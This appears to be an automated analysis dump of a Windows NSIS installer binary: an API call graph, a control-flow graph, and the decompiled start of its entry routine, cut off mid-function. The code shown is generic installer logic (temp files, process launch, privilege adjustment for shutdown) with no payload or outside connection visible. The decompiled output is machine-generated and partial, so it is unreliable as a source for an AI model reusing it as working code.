5520->5524 5522 406557 17 API calls 5521->5522 5523 402397 5522->5523 5523->5524 5525 405b7a MessageBoxIndirectW 5523->5525 5525->5524 5526 402c05 SendMessageW 5527 402c2a 5526->5527 5528 402c1f InvalidateRect 5526->5528 5528->5527 5529 403b87 5530 403b92 5529->5530 5531 403b96 5530->5531 5532 403b99 GlobalAlloc 5530->5532 5532->5531 4601 40350a SetErrorMode GetVersionExW 4602 403594 4601->4602 4603 40355c GetVersionExW 4601->4603 4604 4035ed 4602->4604 4605 4068e7 5 API calls 4602->4605 4603->4602 4606 406877 3 API calls 4604->4606 4605->4604 4607 403603 lstrlenA 4606->4607 4607->4604 4608 403613 4607->4608 4609 4068e7 5 API calls 4608->4609 4610 40361a 4609->4610 4611 4068e7 5 API calls 4610->4611 4612 403621 4611->4612 4613 4068e7 5 API calls 4612->4613 4614 40362d #17 OleInitialize SHGetFileInfoW 4613->4614 4692 40651a lstrcpynW 4614->4692 4617 40367a GetCommandLineW 4693 40651a lstrcpynW 4617->4693 4619 40368c 4620 405e16 CharNextW 4619->4620 4621 4036b2 CharNextW 4620->4621 4630 4036c3 4621->4630 4622 4037c1 4623 4037d5 GetTempPathW 4622->4623 4694 4034d9 4623->4694 4625 4037ed 4627 4037f1 GetWindowsDirectoryW lstrcatW 4625->4627 4628 403847 DeleteFileW 4625->4628 4626 405e16 CharNextW 4626->4630 4631 4034d9 12 API calls 4627->4631 4704 40307d GetTickCount GetModuleFileNameW 4628->4704 4630->4622 4630->4626 4636 4037c3 4630->4636 4633 40380d 4631->4633 4632 40385a 4634 40391e 4632->4634 4637 40390f 4632->4637 4642 405e16 CharNextW 4632->4642 4633->4628 4635 403811 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4633->4635 4796 403aef 4634->4796 4640 4034d9 12 API calls 4635->4640 4788 40651a lstrcpynW 4636->4788 4732 403bc9 4637->4732 4641 40383f 4640->4641 4641->4628 4641->4634 4657 40387c 4642->4657 4645 403a46 4803 405b7a 4645->4803 4646 403a5b 4647 403a63 GetCurrentProcess OpenProcessToken 4646->4647 4648 403ad9 ExitProcess 4646->4648 4650 403aa9 4647->4650 4651 403a7a LookupPrivilegeValueW AdjustTokenPrivileges 4647->4651 4656 4068e7 5 API calls 4650->4656 4651->4650 4653 4038e5 4659 405ef1 18 API calls 4653->4659 4654 403926 4658 405ae5 5 API calls 4654->4658 4661 403ab0 4656->4661 4657->4653 4657->4654 4662 40392b lstrcatW 4658->4662 4660 4038f1 4659->4660 4660->4634 4789 40651a lstrcpynW 4660->4789 4663 403ac5 ExitWindowsEx 4661->4663 4667 403ad2 4661->4667 4664 403947 lstrcatW lstrcmpiW 4662->4664 4665 40393c lstrcatW 4662->4665 4663->4648 4663->4667 4664->4634 4668 403967 4664->4668 4665->4664 4670 40140b 2 API calls 4667->4670 4671 403973 4668->4671 4672 40396c 4668->4672 4669 403904 4790 40651a lstrcpynW 4669->4790 4670->4648 4674 405ac8 2 API calls 4671->4674 4673 405a4b 4 API calls 4672->4673 4676 403971 4673->4676 4677 403978 SetCurrentDirectoryW 4674->4677 4676->4677 4678 403995 4677->4678 4679 40398a 4677->4679 4792 40651a lstrcpynW 4678->4792 4791 40651a lstrcpynW 4679->4791 4682 406557 17 API calls 4683 4039d7 DeleteFileW 4682->4683 4684 4039e3 CopyFileW 4683->4684 4689 4039a2 4683->4689 4684->4689 4685 403a2d 4686 4062da 36 API calls 4685->4686 4686->4634 4687 4062da 36 API calls 4687->4689 4688 406557 17 API calls 4688->4689 4689->4682 4689->4685 4689->4687 4689->4688 4691 403a17 CloseHandle 4689->4691 4793 405afd CreateProcessW 4689->4793 4691->4689 4692->4617 4693->4619 4695 4067a1 5 API calls 4694->4695 4696 4034e5 4695->4696 4697 4034ef 4696->4697 4698 405de9 3 API calls 4696->4698 4697->4625 4699 4034f7 4698->4699 4700 405ac8 2 API calls 4699->4700 4701 4034fd 4700->4701 4807 406039 4701->4807 4811 40600a GetFileAttributesW CreateFileW 4704->4811 4706 4030bd 4731 4030cd 4706->4731 4812 40651a lstrcpynW 4706->4812 4708 4030e3 4709 405e35 2 API calls 4708->4709 4710 4030e9 4709->4710 4813 40651a lstrcpynW 4710->4813 4712 4030f4 GetFileSize 4727 4031ee 4712->4727 4730 40310b 4712->4730 4714 4031f7 4716 403227 GlobalAlloc 4714->4716 4714->4731 4849 4034c2 SetFilePointer 4714->4849 4825 4034c2 SetFilePointer 4716->4825 4718 40325a 4720 403019 6 API calls 4718->4720 4720->4731 4721 403210 4723 4034ac ReadFile 4721->4723 4722 403242 4826 4032b4 4722->4826 4725 40321b 4723->4725 4725->4716 4725->4731 4726 403019 6 API calls 4726->4730 4814 403019 4727->4814 4728 40324e 4728->4728 4729 40328b SetFilePointer 4728->4729 4728->4731 4729->4731 4730->4718 4730->4726 4730->4727 4730->4731 4846 4034ac 4730->4846 4731->4632 4733 4068e7 5 API calls 4732->4733 4734 403bdd 4733->4734 4735 403be3 4734->4735 4736 403bf5 4734->4736 4870 406461 wsprintfW 4735->4870 4737 4063e8 3 API calls 4736->4737 4738 403c25 4737->4738 4739 403c44 lstrcatW 4738->4739 4741 4063e8 3 API calls 4738->4741 4742 403bf3 4739->4742 4741->4739 4855 403e9f 4742->4855 4745 405ef1 18 API calls 4746 403c76 4745->4746 4747 403d0a 4746->4747 4749 4063e8 3 API calls 4746->4749 4748 405ef1 18 API calls 4747->4748 4750 403d10 4748->4750 4751 403ca8 4749->4751 4752 403d20 LoadImageW 4750->4752 4753 406557 17 API calls 4750->4753 4751->4747 4759 403cc9 lstrlenW 4751->4759 4760 405e16 CharNextW 4751->4760 4754 403dc6 4752->4754 4755 403d47 RegisterClassW 4752->4755 4753->4752 4758 40140b 2 API calls 4754->4758 4756 403dd0 4755->4756 4757 403d7d SystemParametersInfoW CreateWindowExW 4755->4757 4756->4634 4757->4754 4763 403dcc 4758->4763 4761 403cd7 lstrcmpiW 4759->4761 4762 403cfd 4759->4762 4764 403cc6 4760->4764 4761->4762 4765 403ce7 GetFileAttributesW 4761->4765 4766 405de9 3 API calls 4762->4766 4763->4756 4768 403e9f 18 API calls 4763->4768 4764->4759 4767 403cf3 4765->4767 4769 403d03 4766->4769 4767->4762 4770 405e35 2 API calls 4767->4770 4771 403ddd 4768->4771 4871 40651a lstrcpynW 4769->4871 4770->4762 4773 403de9 ShowWindow 4771->4773 4774 403e6c 4771->4774 4776 406877 3 API calls 4773->4776 4863 40564f OleInitialize 4774->4863 4778 403e01 4776->4778 4777 403e72 4779 403e76 4777->4779 4780 403e8e 4777->4780 4781 403e0f GetClassInfoW 4778->4781 4785 406877 3 API calls 4778->4785 4779->4756 4787 40140b 2 API calls 4779->4787 4784 40140b 2 API calls 4780->4784 4782 403e23 GetClassInfoW RegisterClassW 4781->4782 4783 403e39 DialogBoxParamW 4781->4783 4782->4783 4786 40140b 2 API calls 4783->4786 4784->4756 4785->4781 4786->4756 4787->4756 4788->4623 4789->4669 4790->4637 4791->4678 4792->4689 4794 405b30 CloseHandle 4793->4794 4795 405b3c 4793->4795 4794->4795 4795->4689 4797 403b07 4796->4797 4798 403af9 CloseHandle 4796->4798 4873 403b34 4797->4873 4798->4797 4801 405c26 67 API calls 4802 403a3b OleUninitialize 4801->4802 4802->4645 4802->4646 4806 405b8f 4803->4806 4804 403a53 ExitProcess 4805 405ba3 MessageBoxIndirectW 4805->4804 4806->4804 4806->4805 4808 406046 GetTickCount GetTempFileNameW 4807->4808 4809 403508 4808->4809 4810 40607c 4808->4810 4809->4625 4810->4808 4810->4809 4811->4706 4812->4708 4813->4712 4815 403022 4814->4815 4816 40303a 4814->4816 4819 403032 4815->4819 4820 40302b DestroyWindow 4815->4820 4817 403042 4816->4817 4818 40304a GetTickCount 4816->4818 4850 406923 4817->4850 4822 403058 CreateDialogParamW ShowWindow 4818->4822 4823 40307b 4818->4823 4819->4714 4820->4819 4822->4823 4823->4714 4825->4722 4827 4032cd 4826->4827 4828 4032fb 4827->4828 4854 4034c2 SetFilePointer 4827->4854 4830 4034ac ReadFile 4828->4830 4831 403306 4830->4831 4832 403445 4831->4832 4833 403318 GetTickCount 4831->4833 4835 40342f 4831->4835 4834 403487 4832->4834 4839 403449 4832->4839 4833->4835 4842 403344 4833->4842 4836 4034ac ReadFile 4834->4836 4835->4728 4836->4835 4837 4034ac ReadFile 4837->4842 4838 4034ac ReadFile 4838->4839 4839->4835 4839->4838 4840 4060bc WriteFile 4839->4840 4840->4839 4841 40339a GetTickCount 4841->4842 4842->4835 4842->4837 4842->4841 4843 4033bf MulDiv wsprintfW 4842->4843 4845 4060bc WriteFile 4842->4845 4844 40557c 24 API calls 4843->4844 4844->4842 4845->4842 4847 40608d ReadFile 4846->4847 4848 4034bf 4847->4848 4848->4730 4849->4721 4851 406940 PeekMessageW 4850->4851 4852 403048 4851->4852 4853 406936 DispatchMessageW 4851->4853 4852->4714 4853->4851 4854->4828 4856 403eb3 4855->4856 4872 406461 wsprintfW 4856->4872 4858 403f24 4859 403f58 18 API calls 4858->4859 4861 403f29 4859->4861 4860 403c54 4860->4745 4861->4860 4862 406557 17 API calls 4861->4862 4862->4861 4864 4044c2 SendMessageW 4863->4864 4866 405672 4864->4866 4865 4044c2 SendMessageW 4867 4056ab OleUninitialize 4865->4867 4868 401389 2 API calls 4866->4868 4869 405699 4866->4869 4867->4777 4868->4866 4869->4865 4870->4742 4871->4747 4872->4858 4874 403b42 4873->4874 4875 403b0c 4874->4875 4876 403b47 FreeLibrary GlobalFree 4874->4876 4875->4801 4876->4875 4876->4876 5533 40248a 5534 402da6 17 API calls 5533->5534 5535 40249c 5534->5535 5536 402da6 17 API calls 5535->5536 5537 4024a6 5536->5537 5550 402e36 5537->5550 5540 402c2a 5541 4024de 5543 4024ea 5541->5543 5546 402d84 17 API calls 5541->5546 5542 402da6 17 API calls 5545 4024d4 lstrlenW 5542->5545 5544 402509 RegSetValueExW 5543->5544 5547 4032b4 31 API calls 5543->5547 5548 40251f RegCloseKey 5544->5548 5545->5541 5546->5543 5547->5544 5548->5540 5551 402e51 5550->5551 5554 4063b5 5551->5554 5555 4063c4 5554->5555 5556 4024b6 5555->5556 5557 4063cf RegCreateKeyExW 5555->5557 5556->5540 5556->5541 5556->5542 5557->5556 5558 40290b 5559 402da6 17 API calls 5558->5559 5560 402912 FindFirstFileW 5559->5560 5561 40293a 5560->5561 5564 402925 5560->5564 5562 402943 5561->5562 5566 406461 wsprintfW 5561->5566 5567 40651a lstrcpynW 5562->5567 5566->5562 5567->5564 5568 40190c 5569 401943 5568->5569 5570 402da6 17 API calls 5569->5570 5571 401948 5570->5571 5572 405c26 67 API calls 5571->5572 5573 401951 5572->5573 5574 734f1000 5577 734f101b 5574->5577 5578 734f15b6 GlobalFree 5577->5578 5579 734f1020 5578->5579 5580 734f1027 GlobalAlloc 5579->5580 5581 734f1024 5579->5581 5580->5581 5582 734f15dd 3 API calls 5581->5582 5583 734f1019 5582->5583 5584 40190f 5585 402da6 17 API calls 5584->5585 5586 401916 5585->5586 5587 405b7a MessageBoxIndirectW 5586->5587 5588 40191f 5587->5588 5589 401491 5590 40557c 24 API calls 5589->5590 5591 401498 5590->5591 5592 402891 5593 402898 5592->5593 5595 402ba9 5592->5595 5594 402d84 17 API calls 5593->5594 5596 40289f 5594->5596 5597 4028ae SetFilePointer 5596->5597 5597->5595 5598 4028be 5597->5598 5600 406461 wsprintfW 5598->5600 5600->5595 5601 401f12 5602 402da6 17 API calls 5601->5602 5603 401f18 5602->5603 5604 402da6 17 API calls 5603->5604 5605 401f21 5604->5605 5606 402da6 17 API calls 5605->5606 5607 401f2a 5606->5607 5608 402da6 17 API calls 5607->5608 5609 401f33 5608->5609 5610 401423 24 API calls 5609->5610 5611 401f3a 5610->5611 5618 405b40 ShellExecuteExW 5611->5618 5613 401f82 5615 40292e 5613->5615 5619 406992 WaitForSingleObject 5613->5619 5616 401f9f CloseHandle 5616->5615 5618->5613 5620 4069ac 5619->5620 5621 4069be GetExitCodeProcess 5620->5621 5622 406923 2 API calls 5620->5622 5621->5616 5623 4069b3 WaitForSingleObject 5622->5623 5623->5620 5624 402f93 5625 402fa5 SetTimer 5624->5625 5626 402fbe 5624->5626 5625->5626 5627 403013 5626->5627 5628 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5626->5628 5628->5627 5629 401d17 5630 402d84 17 API calls 5629->5630 5631 401d1d IsWindow 5630->5631 5632 401a20 5631->5632 4877 401b9b 4878 401bec 4877->4878 4883 401ba8 4877->4883 4880 401bf1 4878->4880 4881 401c16 GlobalAlloc 4878->4881 4879 401c31 4884 406557 17 API calls 4879->4884 4890 40239d 4879->4890 4880->4890 4898 40651a lstrcpynW 4880->4898 4882 406557 17 API calls 4881->4882 4882->4879 4883->4879 4885 401bbf 4883->4885 4886 402397 4884->4886 4896 40651a lstrcpynW 4885->4896 4886->4890 4892 405b7a MessageBoxIndirectW 4886->4892 4888 401c03 GlobalFree 4888->4890 4891 401bce 4897 40651a lstrcpynW 4891->4897 4892->4890 4894 401bdd 4899 40651a lstrcpynW 4894->4899 4896->4891 4897->4894 4898->4888 4899->4890 5633 40261c 5634 402da6 17 API calls 5633->5634 5635 402623 5634->5635 5638 40600a GetFileAttributesW CreateFileW 5635->5638 5637 40262f 5638->5637 5639 40149e 5640 4014ac PostQuitMessage 5639->5640 5641 40239d 5639->5641 5640->5641 5642 40259e 5652 402de6 5642->5652 5645 402d84 17 API calls 5646 4025b1 5645->5646 5647 4025d9 RegEnumValueW 5646->5647 5648 4025cd RegEnumKeyW 5646->5648 5650 40292e 5646->5650 5649 4025ee RegCloseKey 5647->5649 5648->5649 5649->5650 5653 402da6 17 API calls 5652->5653 5654 402dfd 5653->5654 5655 406387 RegOpenKeyExW 5654->5655 5656 4025a8 5655->5656 5656->5645 5657 404920 5658 404930 5657->5658 5659 404956 5657->5659 5660 404476 18 API calls 5658->5660 5661 4044dd 8 API calls 5659->5661 5663 40493d SetDlgItemTextW 5660->5663 5662 404962 5661->5662 5663->5659 5664 4015a3 5665 402da6 17 API calls 5664->5665 5666 4015aa SetFileAttributesW 5665->5666 5667 4015bc 5666->5667 5668 401fa4 5669 402da6 17 API calls 5668->5669 5670 401faa 5669->5670 5671 40557c 24 API calls 5670->5671 5672 401fb4 5671->5672 5673 405afd 2 API calls 5672->5673 5674 401fba 5673->5674 5675 406992 5 API calls 5674->5675 5677 40292e 5674->5677 5680 401fdd CloseHandle 5674->5680 5678 401fcf 5675->5678 5678->5680 5681 406461 wsprintfW 5678->5681 5680->5677 5681->5680 5682 40202a 5683 402da6 17 API calls 5682->5683 5684 402031 5683->5684 5685 4068e7 5 API calls 5684->5685 5686 402040 5685->5686 5687 4020cc 5686->5687 5688 40205c GlobalAlloc 5686->5688 5688->5687 5689 402070 5688->5689 5690 4068e7 5 API calls 5689->5690 5691 402077 5690->5691 5692 4068e7 5 API calls 5691->5692 5693 402081 5692->5693 5693->5687 5697 406461 wsprintfW 5693->5697 5695 4020ba 5698 406461 wsprintfW 5695->5698 5697->5695 5698->5687 5699 40252a 5700 402de6 17 API calls 5699->5700 5701 402534 5700->5701 5702 402da6 17 API calls 5701->5702 5703 40253d 5702->5703 5704 402548 RegQueryValueExW 5703->5704 5707 40292e 5703->5707 5705 402568 5704->5705 5706 40256e RegCloseKey 5704->5706 5705->5706 5710 406461 wsprintfW 5705->5710 5706->5707 5710->5706 5711 4021aa 5712 402da6 17 API calls 5711->5712 5713 4021b1 5712->5713 5714 402da6 17 API calls 5713->5714 5715 4021bb 5714->5715 5716 402da6 17 API calls 5715->5716 5717 4021c5 5716->5717 5718 402da6 17 API calls 5717->5718 5719 4021cf 5718->5719 5720 402da6 17 API calls 5719->5720 5721 4021d9 5720->5721 5722 402218 CoCreateInstance 5721->5722 5723 402da6 17 API calls 5721->5723 5726 402237 5722->5726 5723->5722 5724 401423 24 API calls 5725 4022f6 5724->5725 5726->5724 5726->5725 5727 4045ac lstrcpynW lstrlenW 5728 401a30 5729 402da6 17 API calls 5728->5729 5730 401a39 ExpandEnvironmentStringsW 5729->5730 5731 401a4d 5730->5731 5733 401a60 5730->5733 5732 401a52 lstrcmpW 5731->5732 5731->5733 5732->5733 5739 734f103d 5740 734f101b 5 API calls 5739->5740 5741 734f1056 5740->5741 5742 4023b2 5743 4023c0 5742->5743 5744 4023ba 5742->5744 5746 4023ce 5743->5746 5747 402da6 17 API calls 5743->5747 5745 402da6 17 API calls 5744->5745 5745->5743 5748 4023dc 5746->5748 5749 402da6 17 API calls 5746->5749 5747->5746 5750 402da6 17 API calls 5748->5750 5749->5748 5751 4023e5 WritePrivateProfileStringW 5750->5751 5752 402434 5753 402467 5752->5753 5754 40243c 5752->5754 5755 402da6 17 API calls 5753->5755 5756 402de6 17 API calls 5754->5756 5757 40246e 5755->5757 5758 402443 5756->5758 5763 402e64 5757->5763 5760 402da6 17 API calls 5758->5760 5762 40247b 5758->5762 5761 402454 RegDeleteValueW RegCloseKey 5760->5761 5761->5762 5764 402e71 5763->5764 5765 402e78 5763->5765 5764->5762 5765->5764 5767 402ea9 5765->5767 5768 406387 RegOpenKeyExW 5767->5768 5769 402ed7 5768->5769 5770 402ee7 RegEnumValueW 5769->5770 5771 402f0a 5769->5771 5778 402f81 5769->5778 5770->5771 5772 402f71 RegCloseKey 5770->5772 5771->5772 5773 402f46 RegEnumKeyW 5771->5773 5774 402f4f RegCloseKey 5771->5774 5777 402ea9 6 API calls 5771->5777 5772->5778 5773->5771 5773->5774 5775 4068e7 5 API calls 5774->5775 5776 402f5f 5775->5776 5776->5778 5779 402f63 RegDeleteKeyW 5776->5779 5777->5771 5778->5764 5779->5778 5780 404635 5781 40464d 5780->5781 5788 404767 5780->5788 5785 404476 18 API calls 5781->5785 5782 4047d1 5783 40489b 5782->5783 5784 4047db GetDlgItem 5782->5784 5791 4044dd 8 API calls 5783->5791 5786 4047f5 5784->5786 5787 40485c 5784->5787 5790 4046b4 5785->5790 5786->5787 5795 40481b SendMessageW LoadCursorW SetCursor 5786->5795 5787->5783 5796 40486e 5787->5796 5788->5782 5788->5783 5789 4047a2 GetDlgItem SendMessageW 5788->5789 5813 404498 KiUserCallbackDispatcher 5789->5813 5793 404476 18 API calls 5790->5793 5794 404896 5791->5794 5798 4046c1 CheckDlgButton 5793->5798 5814 4048e4 5795->5814 5800 404884 5796->5800 5801 404874 SendMessageW 5796->5801 5797 4047cc 5803 4048c0 SendMessageW 5797->5803 5811 404498 KiUserCallbackDispatcher 5798->5811 5800->5794 5802 40488a SendMessageW 5800->5802 5801->5800 5802->5794 5803->5782 5806 4046df GetDlgItem 5812 4044ab SendMessageW 5806->5812 5808 4046f5 SendMessageW 5809 404712 GetSysColor 5808->5809 5810 40471b SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5808->5810 5809->5810 5810->5794 5811->5806 5812->5808 5813->5797 5817 405b40 ShellExecuteExW 5814->5817 5816 40484a LoadCursorW SetCursor 5816->5787 5817->5816 5818 401735 5819 402da6 17 API calls 5818->5819 5820 40173c SearchPathW 5819->5820 5821 401757 5820->5821 5822 4014b8 5823 4014be 5822->5823 5824 401389 2 API calls 5823->5824 5825 4014c6 5824->5825 5826 401d38 5827 402d84 17 API calls 5826->5827 5828 401d3f 5827->5828 5829 402d84 17 API calls 5828->5829 5830 401d4b GetDlgItem 5829->5830 5831 402638 5830->5831 4900 4056bb 4901 405865 4900->4901 4902 4056dc GetDlgItem GetDlgItem GetDlgItem 4900->4902 4904 405896 4901->4904 4905 40586e GetDlgItem CreateThread CloseHandle 4901->4905 4946 4044ab SendMessageW 4902->4946 4907 4058c1 4904->4907 4908 4058e6 4904->4908 4909 4058ad ShowWindow ShowWindow 4904->4909 4905->4904 4949 40564f 5 API calls 4905->4949 4906 40574c 4916 405753 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4906->4916 4910 405921 4907->4910 4911 4058cd 4907->4911 4915 4044dd 8 API calls 4908->4915 4948 4044ab SendMessageW 4909->4948 4910->4908 4917 40592f SendMessageW 4910->4917 4913 4058d5 4911->4913 4914 4058fb ShowWindow 4911->4914 4918 40444f SendMessageW 4913->4918 4919 40591b 4914->4919 4920 40590d 4914->4920 4923 4058f4 4915->4923 4921 4057c1 4916->4921 4922 4057a5 SendMessageW SendMessageW 4916->4922 4917->4923 4924 405948 CreatePopupMenu 4917->4924 4918->4908 4928 40444f SendMessageW 4919->4928 4927 40557c 24 API calls 4920->4927 4925 4057d4 4921->4925 4926 4057c6 SendMessageW 4921->4926 4922->4921 4929 406557 17 API calls 4924->4929 4930 404476 18 API calls 4925->4930 4926->4925 4927->4919 4928->4910 4931 405958 AppendMenuW 4929->4931 4932 4057e4 4930->4932 4933 405975 GetWindowRect 4931->4933 4934 405988 TrackPopupMenu 4931->4934 4935 405821 GetDlgItem SendMessageW 4932->4935 4936 4057ed ShowWindow 4932->4936 4933->4934 4934->4923 4937 4059a3 4934->4937 4935->4923 4940 405848 SendMessageW SendMessageW 4935->4940 4938 405810 4936->4938 4939 405803 ShowWindow 4936->4939 4941 4059bf SendMessageW 4937->4941 4947 4044ab SendMessageW 4938->4947 4939->4938 4940->4923 4941->4941 4942 4059dc OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4941->4942 4944 405a01 SendMessageW 4942->4944 4944->4944 4945 405a2a GlobalUnlock SetClipboardData CloseClipboard 4944->4945 4945->4923 4946->4906 4947->4935 4948->4907 5832 404cbd 5833 404ce9 5832->5833 5834 404ccd 5832->5834 5836 404d1c 5833->5836 5837 404cef SHGetPathFromIDListW 5833->5837 5843 405b5e GetDlgItemTextW 5834->5843 5839 404d06 SendMessageW 5837->5839 5840 404cff 5837->5840 5838 404cda SendMessageW 5838->5833 5839->5836 5841 40140b 2 API calls 5840->5841 5841->5839 5843->5838 5844 40263e 5845 402652 5844->5845 5846 40266d 5844->5846 5847 402d84 17 API calls 5845->5847 5848 402672 5846->5848 5849 40269d 5846->5849 5858 402659 5847->5858 5850 402da6 17 API calls 5848->5850 5851 402da6 17 API calls 5849->5851 5853 402679 5850->5853 5852 4026a4 lstrlenW 5851->5852 5852->5858 5861 40653c WideCharToMultiByte 5853->5861 5855 40268d lstrlenA 5855->5858 5856 4026e7 5857 4026d1 5857->5856 5859 4060bc WriteFile 5857->5859 5858->5856 5858->5857 5860 4060eb 5 API calls 5858->5860 5859->5856 5860->5857 5861->5855

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 40350a-40355a SetErrorMode GetVersionExW 1 403594-40359b 0->1 2 40355c-403590 GetVersionExW 0->2 3 4035a5-4035e5 1->3 4 40359d 1->4 2->1 5 4035e7-4035ef call 4068e7 3->5 6 4035f8 3->6 4->3 5->6 11 4035f1 5->11 8 4035fd-403611 call 406877 lstrlenA 6->8 13 403613-40362f call 4068e7 * 3 8->13 11->6 20 403640-4036a2 #17 OleInitialize SHGetFileInfoW call 40651a GetCommandLineW call 40651a 13->20 21 403631-403637 13->21 28 4036a4-4036a6 20->28 29 4036ab-4036be call 405e16 CharNextW 20->29 21->20 25 403639 21->25 25->20 28->29 32 4037b5-4037bb 29->32 33 4037c1 32->33 34 4036c3-4036c9 32->34 37 4037d5-4037ef GetTempPathW call 4034d9 33->37 35 4036d2-4036d8 34->35 36 4036cb-4036d0 34->36 38 4036da-4036de 35->38 39 4036df-4036e3 35->39 36->35 36->36 47 4037f1-40380f GetWindowsDirectoryW lstrcatW call 4034d9 37->47 48 403847-40385f DeleteFileW call 40307d 37->48 38->39 41 4037a3-4037b1 call 405e16 39->41 42 4036e9-4036ef 39->42 41->32 56 4037b3-4037b4 41->56 45 4036f1-4036f8 42->45 46 403709-403742 42->46 51 4036fa-4036fd 45->51 52 4036ff 45->52 53 403744-403749 46->53 54 40375e-403798 46->54 47->48 66 403811-403841 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034d9 47->66 62 403865-40386b 48->62 63 403a36-403a44 call 403aef OleUninitialize 48->63 51->46 51->52 52->46 53->54 58 40374b-403753 53->58 60 4037a0-4037a2 54->60 61 40379a-40379e 54->61 56->32 64 403755-403758 58->64 65 40375a 58->65 60->41 61->60 67 4037c3-4037d0 call 40651a 61->67 68 403871-403884 call 405e16 62->68 69 403912-403919 call 403bc9 62->69 79 403a46-403a55 call 405b7a ExitProcess 63->79 80 403a5b-403a61 63->80 64->54 64->65 65->54 66->48 66->63 67->37 83 4038d6-4038e3 68->83 84 403886-4038bb 68->84 78 40391e-403921 69->78 78->63 81 403a63-403a78 GetCurrentProcess OpenProcessToken 80->81 82 403ad9-403ae1 80->82 86 403aa9-403ab7 call 4068e7 81->86 87 403a7a-403aa3 LookupPrivilegeValueW AdjustTokenPrivileges 81->87 89 403ae3 82->89 90 403ae6-403ae9 ExitProcess 82->90 91 4038e5-4038f3 call 405ef1 83->91 92 403926-40393a call 405ae5 lstrcatW 83->92 88 4038bd-4038c1 84->88 104 403ac5-403ad0 ExitWindowsEx 86->104 105 403ab9-403ac3 86->105 87->86 95 4038c3-4038c8 88->95 96 4038ca-4038d2 88->96 89->90 91->63 103 4038f9-40390f call 40651a * 2 91->103 106 403947-403961 lstrcatW lstrcmpiW 92->106 107 40393c-403942 lstrcatW 92->107 95->96 101 4038d4 95->101 96->88 96->101 101->83 103->69 104->82 109 403ad2-403ad4 call 40140b 104->109 105->104 105->109 110 403a34 106->110 111 403967-40396a 106->111 107->106 109->82 110->63 115 403973 call 405ac8 111->115 116 40396c-403971 call 405a4b 111->116 121 403978-403988 SetCurrentDirectoryW 115->121 116->121 123 403995-4039c1 call 40651a 121->123 124 40398a-403990 call 40651a 121->124 128 4039c6-4039e1 call 406557 DeleteFileW 123->128 124->123 131 403a21-403a2b 128->131 132 4039e3-4039f3 CopyFileW 128->132 131->128 133 403a2d-403a2f call 4062da 131->133 132->131 134 4039f5-403a15 call 4062da call 406557 call 405afd 132->134 133->110 134->131 142 403a17-403a1e CloseHandle 134->142 142->131
                    C-Code - Quality: 79%
                    			_entry_() {
                    				WCHAR* _v8;
                    				signed int _v12;
                    				void* _v16;
                    				signed int _v20;
                    				int _v24;
                    				int _v28;
                    				struct _TOKEN_PRIVILEGES _v40;
                    				signed char _v42;
                    				int _v44;
                    				signed int _v48;
                    				intOrPtr _v278;
                    				signed short _v310;
                    				struct _OSVERSIONINFOW _v324;
                    				struct _SHFILEINFOW _v1016;
                    				intOrPtr* _t88;
                    				intOrPtr* _t94;
                    				void _t97;
                    				void* _t116;
                    				WCHAR* _t118;
                    				signed int _t120;
                    				intOrPtr* _t124;
                    				void* _t138;
                    				void* _t144;
                    				void* _t149;
                    				void* _t153;
                    				void* _t158;
                    				signed int _t168;
                    				void* _t171;
                    				void* _t176;
                    				intOrPtr _t178;
                    				intOrPtr _t179;
                    				intOrPtr* _t180;
                    				int _t189;
                    				void* _t190;
                    				void* _t199;
                    				signed int _t205;
                    				signed int _t210;
                    				signed int _t215;
                    				int* _t219;
                    				signed int _t227;
                    				signed int _t230;
                    				CHAR* _t232;
                    				signed int _t234;
                    				WCHAR* _t235;
                    
                    				0x7b3000 = 0x20;
                    				_t189 = 0;
                    				_v24 = 0;
                    				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                    				_v20 = 0;
                    				SetErrorMode(0x8001); // executed
                    				_v324.szCSDVersion = 0;
                    				_v48 = 0;
                    				_v44 = 0;
                    				_v324.dwOSVersionInfoSize = 0x11c;
                    				if(GetVersionExW( &_v324) == 0) {
                    					_v324.dwOSVersionInfoSize = 0x114;
                    					GetVersionExW( &_v324);
                    					asm("sbb eax, eax");
                    					_v42 = 4;
                    					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                    				}
                    				if(_v324.dwMajorVersion < 0xa) {
                    					_v310 = _v310 & 0x00000000;
                    				}
                    				 *0x7a8b18 = _v324.dwBuildNumber;
                    				 *0x7a8b1c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                    				if( *0x7a8b1e != 0x600) {
                    					_t180 = E004068E7(_t189);
                    					if(_t180 != _t189) {
                    						 *_t180(0xc00);
                    					}
                    				}
                    				_t232 = "UXTHEME";
                    				do {
                    					E00406877(_t232); // executed
                    					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
                    				} while ( *_t232 != 0);
                    				E004068E7(0xb);
                    				 *0x7a8a64 = E004068E7(9);
                    				_t88 = E004068E7(7);
                    				if(_t88 != _t189) {
                    					_t88 =  *_t88(0x1e);
                    					if(_t88 != 0) {
                    						 *0x7a8b1c =  *0x7a8b1c | 0x00000080;
                    					}
                    				}
                    				__imp__#17();
                    				__imp__OleInitialize(_t189); // executed
                    				 *0x7a8b20 = _t88;
                    				SHGetFileInfoW(0x79ff08, _t189,  &_v1016, 0x2b4, _t189); // executed
                    				E0040651A(0x7a7a60, L"NSIS Error");
                    				E0040651A(0x7b3000, GetCommandLineW());
                    				_t94 = 0x7b3000;
                    				_t234 = 0x22;
                    				 *0x7a8a60 = 0x400000;
                    				if( *0x7b3000 == _t234) {
                    					_t94 = 0x7b3002;
                    				}
                    				_t199 = CharNextW(E00405E16(_t94, 0x7b3000));
                    				_v16 = _t199;
                    				while(1) {
                    					_t97 =  *_t199;
                    					_t252 = _t97 - _t189;
                    					if(_t97 == _t189) {
                    						break;
                    					}
                    					_t210 = 0x20;
                    					__eflags = _t97 - _t210;
                    					if(_t97 != _t210) {
                    						L17:
                    						__eflags =  *_t199 - _t234;
                    						_v12 = _t210;
                    						if( *_t199 == _t234) {
                    							_v12 = _t234;
                    							_t199 = _t199 + 2;
